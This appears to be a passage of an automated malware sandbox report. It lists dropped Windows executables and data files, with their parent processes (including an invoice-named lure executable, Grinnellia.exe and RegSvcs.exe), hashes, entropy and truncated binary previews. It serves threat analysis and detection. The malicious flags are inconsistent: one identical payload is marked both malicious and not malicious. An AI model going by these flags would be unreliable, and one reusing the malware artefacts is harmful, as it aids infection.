                                                                                                                                                                                                    SHA1:31F5840140C0BE9091F70DD9CFDA4ADA72C92F5E
                                                                                                                                                                                                    SHA-256:73F79E3013230D2AEEFC8DFB8D8A327965E5181D242F84ABF8EF2E051CC354F2
                                                                                                                                                                                                    SHA-512:026F16B8DC6FE923AB360494EE9D3B1FA2C977F3254E71E6DC177C6801A2DB9FE9E89BEF28F1C0723816F62EFC3870CE769EA55ED7556B785FDFD296E5C0A5E7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......T.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                                                    Entropy (8bit):6.80834621013256
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:AC1vpgXcZHznsqjnhMgeiCl7G0nehbGZpbD:AC1vpIcN7Dmg27RnWGj
                                                                                                                                                                                                    MD5:B01F91AFC327CFDED320D3678A583409
                                                                                                                                                                                                    SHA1:A900A13BC6B7723877E1DB2C346B71CC84D5237B
                                                                                                                                                                                                    SHA-256:5CDCF6ED5A64C91127D96196E26FBB48D2D5D1623E0A99F528F7A3BAD00B0C58
                                                                                                                                                                                                    SHA-512:FA8A7DE0BB3C9A63C87C1DAA167CF0AD8130628DF59EB09EEE4B1F08C299C2BD15340770E5754F0B0A17552B8AA2A9C75B4EA74A7B5DB2C72E30D6CA233A4223
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                    Entropy (8bit):5.140020048157583
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:zSwjDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zvDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:19731DBF5C3CEA3602981318C81F0684
                                                                                                                                                                                                    SHA1:A0140A21BE665DE98DBC679A76EBF1284D46F3BA
                                                                                                                                                                                                    SHA-256:F69D93E72AB84056909EE3777C0C55BC38E26B5C220646B38A59D8FF3EBB1489
                                                                                                                                                                                                    SHA-512:5910C7236944ADA933B30E54A7CAF4CAA65F488EF5976169DB417F4FF589D64CAE8783B46A030129E9A3AF30CA81578E9E7B61D41AC9B3429E69B186A6A3B3B6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................[.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                    Entropy (8bit):5.4411507731359245
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:nWKntIfGpxsqjnhMgeiCl7G0nehbGZpbD:W8IeDDmg27RnWGj
                                                                                                                                                                                                    MD5:95E97183B4AD28CE77BAE3413982BFD3
                                                                                                                                                                                                    SHA1:3859441A2EF3F8D41D8E1697328BEC8C7FFCD13F
                                                                                                                                                                                                    SHA-256:03C18A44BE9A7F3272329F9E74B72DDF90AE61FCF527F794041663CE3AC913F6
                                                                                                                                                                                                    SHA-512:7D556B31FDF55B83662D41EA831164766525739F2F5EE630D718C1A680E34E01180174FCB7175027A82F4BEEE329DBC5893D930E4C96586CBC6DCA35FDE7B460
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................v.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                    Entropy (8bit):5.103285786855056
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:5Ih/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:E/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:3537761672E893692C7B7B8B9E80B66C
                                                                                                                                                                                                    SHA1:5EFE5D1C8CEB4DC4FE709B109E11F1292878BE45
                                                                                                                                                                                                    SHA-256:7486E984239780529BA67900898EF8F591F4120F73D9C0676AA0218343CEA48F
                                                                                                                                                                                                    SHA-512:F15BABAF68C3B19220D0E7367E41EA8B8CC207481FFCE044D45CB7BF9060F4AAFCA853A354E734164B6A2EAF9018D7F768BB1F424E1C997A428416AAD11A3DEF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                                                    Entropy (8bit):5.421205929530571
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:R8oREwt2ioQ3J+ROsqjnhMgeiCl7G0nehbGZpbD:R8oRpoFiDmg27RnWGj
                                                                                                                                                                                                    MD5:E98F61506AF26B0BCECED1628DDCFB9D
                                                                                                                                                                                                    SHA1:02A85B08FBA6D1C5AE268406C0D9A6FFE1322CB3
                                                                                                                                                                                                    SHA-256:C772D87B20C3CCFAADAE7710434A9FFE1777B097C646D39E38E040D430E1E194
                                                                                                                                                                                                    SHA-512:78DE1CEC2B065B6083C81976C7750E799A46547BF6DF01D3AE1F276940770A7A8330FA02D9CD7171FA3593241AA86D66EAABC6C94ACAF46F96BEB65174215CF7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.....................................w.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1851904
                                                                                                                                                                                                    Entropy (8bit):7.517430962460623
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:Otb20pfaCqT5TBWgNQ7aDEgJ+y+wn4DocDtE6AE5sqjnhMgeiCl7G0nehbGZpbD:7Yg5tQ7aDEPy+wn47DK5qDmg27RnWGj
                                                                                                                                                                                                    MD5:33FFA6B9A3022156B4592E17F1A9A074
                                                                                                                                                                                                    SHA1:8EC7BEB8A9BB5C5FDF769698EA2ABF553E6A655D
                                                                                                                                                                                                    SHA-256:B336830D627101633DB934F8D48606639C70D133A5985026BC250C035E887FAF
                                                                                                                                                                                                    SHA-512:046BB90347BAF7FB63536EB0B527E8BF881DB5220617AD4E679B4123FC5D81363F2ED98CCC966C19197DB68261783C6C9D332CE9EC45645065D80935886F25BE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....d@g..........".................t_............@.................................Y.........@.......@......................p..|....@..H...........................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...H....@......................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):520
                                                                                                                                                                                                    Entropy (8bit):5.355496254154943
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                                                                                                    MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                                                                                                    SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                                                                                                    SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                                                                                                    SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                                                    Entropy (8bit):5.379677338874509
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:tLHxvIIwLgZ2KRHWLOug8s
                                                                                                                                                                                                    MD5:AAC9B2CC385B2595E11AAF60C4652279
                                                                                                                                                                                                    SHA1:5F14BE9EC829371BFAC9DDBF97BF156C13E03341
                                                                                                                                                                                                    SHA-256:0C17939EA24BBFE7F727AFB0FABC5BAFC8F2A8A5218BC9B2A7580A54B510EC84
                                                                                                                                                                                                    SHA-512:3BC9F81C7C9FD417B7F486550EBBE95CF4BA5408E013AB11FA54400F49DB8ACDAD5EE28C95278DACF62E6FDB30071D193EED741616C91E48F9A2ADC92EAAB257
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):70656
                                                                                                                                                                                                    Entropy (8bit):4.910353963160109
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                                                                                    MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                    SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                                                                                    SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                                                                                    SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    File Type:StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):345600
                                                                                                                                                                                                    Entropy (8bit):7.924466320417484
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
                                                                                                                                                                                                    MD5:51E866564694747435D2C707254F6500
                                                                                                                                                                                                    SHA1:7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
                                                                                                                                                                                                    SHA-256:41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
                                                                                                                                                                                                    SHA-512:987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    File Type:StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):345600
                                                                                                                                                                                                    Entropy (8bit):7.924466320417484
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
                                                                                                                                                                                                    MD5:51E866564694747435D2C707254F6500
                                                                                                                                                                                                    SHA1:7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
                                                                                                                                                                                                    SHA-256:41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
                                                                                                                                                                                                    SHA-512:987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    File Type:StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):345600
                                                                                                                                                                                                    Entropy (8bit):7.924466320417484
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
                                                                                                                                                                                                    MD5:51E866564694747435D2C707254F6500
                                                                                                                                                                                                    SHA1:7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
                                                                                                                                                                                                    SHA-256:41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
                                                                                                                                                                                                    SHA-512:987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
